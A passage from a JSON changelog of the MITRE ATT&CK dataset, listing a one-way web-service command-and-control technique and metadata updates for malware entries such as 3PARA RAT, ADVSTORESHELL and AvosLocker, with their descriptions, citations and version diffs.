"2025-04-25 14:47:30.432000+00:00", + "name": "One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/003", + "external_id": "T1102.003" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:30.432000+00:00\", \"old_value\": \"2025-04-15 19:58:53.389000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--7bec698a-7e20-4fd3-bb6a-12787770fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:44.131000+00:00", + "modified": "2025-04-25 14:43:49.838000+00:00", + "name": "3PARA RAT", + "description": "[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0066", + "external_id": "S0066" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "3PARA RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:49.838000+00:00\", \"old_value\": \"2025-04-16 20:38:18.768000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:43.664000+00:00", + "modified": "2025-04-25 14:44:01.375000+00:00", + "name": "4H RAT", + "description": "[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0065", + "external_id": "S0065" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "4H RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:01.375000+00:00\", \"old_value\": \"2025-04-16 20:38:22.132000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 16:58:56.032000+00:00", + "modified": "2025-04-25 14:44:14.945000+00:00", + "name": "ABK", + "description": "[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0469", + "external_id": "S0469" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ABK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:14.945000+00:00\", \"old_value\": \"2025-04-16 20:38:27.718000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:34.648000+00:00", + "modified": "2025-04-25 14:45:09.488000+00:00", + "name": "ADVSTORESHELL", + "description": "[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0045", + "external_id": "S0045" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ESET Sednit Part 2", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ADVSTORESHELL", + "AZZY", + "EVILTOSS", + "NETUI", + "Sedreco" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:09.488000+00:00\", \"old_value\": \"2025-04-16 20:38:45.086000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--40d3e230-ed32-469f-ba89-be70cc08ab39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:59.153000+00:00", + "modified": "2025-04-25 14:43:05.955000+00:00", + "name": "Agent.btz", + "description": "[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0092", + "external_id": "S0092" + }, + { + "source_name": "Securelist Agent.btz", + "description": "Gostev, A.. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.", + "url": "https://securelist.com/agent-btz-a-source-of-inspiration/58551/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Agent.btz" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:05.955000+00:00\", \"old_value\": \"2025-04-16 20:38:03.857000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--295721d2-ee20-4fa3-ade3-37f4146b4570", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-10 14:53:49.448000+00:00", + "modified": "2025-04-25 14:42:53.967000+00:00", + "name": "AppleSeed", + "description": "[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0622", + "external_id": "S0622" + }, + { + "source_name": "Malwarebytes Kimsuky June 2021", + "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AppleSeed" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:53.967000+00:00\", \"old_value\": \"2025-04-16 20:37:59.641000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f5352566-1a64-49ac-8f7f-97e1d1a03300", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:14.551000+00:00", + "modified": "2025-04-25 14:45:05.203000+00:00", + "name": "AutoIt backdoor", + "description": "[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0129", + "external_id": "S0129" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AutoIt backdoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.203000+00:00\", \"old_value\": \"2025-04-16 20:38:43.395000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--58c5a3a1-928f-4094-9e98-a5a4e56dd5f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-23 19:38:33.073000+00:00", + "modified": "2025-04-25 14:43:26.180000+00:00", + "name": "Avaddon", + "description": "[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0640", + "external_id": "S0640" + }, + { + "source_name": "Awake Security Avaddon", + "description": "Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.", + "url": "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/" + }, + { + "source_name": "Arxiv Avaddon Feb 2021", + "description": "Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.", + "url": "https://arxiv.org/pdf/2102.04796.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Avaddon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Global Information Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:26.180000+00:00\", \"old_value\": \"2025-04-16 20:38:10.078000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-01-11 21:17:36.149000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "AvosLocker", + "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1053", + "external_id": "S1053" + }, + { + "source_name": "Joint CSA AvosLocker Mar 2022", + "description": "FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.", + "url": "https://www.ic3.gov/Media/News/2022/220318.pdf" + }, + { + "source_name": "Malwarebytes AvosLocker Jul 2021", + "description": "Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.", + "url": "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners" + }, + { + "source_name": "Trend Micro AvosLocker Apr 2022", + "description": "Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AvosLocker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-16 20:37:54.114000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:12.926000+00:00", + "name": "BADCALL", + "description": "[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0245", + "external_id": "S0245" + }, + { + "source_name": "BADCALL", + "description": "(Citation: US-CERT BADCALL)" + }, + { + "source_name": "US-CERT BADCALL", + "description": "US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.", + "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADCALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:12.926000+00:00\", \"old_value\": \"2025-04-16 20:38:26.720000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--57d83eac-a2ea-42b0-a7b2-c80c55157790", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-26 18:49:41.155000+00:00", + "modified": "2025-04-25 14:43:25.093000+00:00", + "name": "BADFLICK", + "description": "[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0642", + "external_id": "S0642" + }, + { + "source_name": "FireEye Periscope March 2018", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + }, + { + "source_name": "Accenture MUDCARP March 2019", + "description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADFLICK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.093000+00:00\", \"old_value\": \"2025-04-16 20:38:09.558000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e9595678-d269-469e-ae6b-75e49259de63", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:14.118000+00:00", + "modified": "2025-04-25 14:44:59.677000+00:00", + "name": "BADNEWS", + "description": "[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0128", + "external_id": "S0128" + }, + { + "source_name": "BADNEWS", + "description": "(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADNEWS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:59.677000+00:00\", \"old_value\": \"2025-04-16 20:38:41.446000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 18:00:28.497000+00:00", + "modified": "2025-04-25 14:45:02.531000+00:00", + "name": "BBK", + "description": "[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0470", + "external_id": "S0470" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BBK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:02.531000+00:00\", \"old_value\": \"2025-04-16 20:38:42.578000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--64d76fa5-cf8f-469c-b78c-1a4f7c5bad80", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:13.664000+00:00", + "modified": "2025-04-25 14:43:36.304000+00:00", + "name": "BBSRAT", + "description": "[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0127", + "external_id": "S0127" + }, + { + "source_name": "Palo Alto Networks BBSRAT", + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BBSRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:36.304000+00:00\", \"old_value\": \"2025-04-16 20:38:13.507000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--d5268dfb-ae2b-4e0e-ac07-02a460613d8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-18 20:16:12.119000+00:00", + "modified": "2025-04-25 14:44:47.458000+00:00", + "name": "BONDUPDATER", + "description": 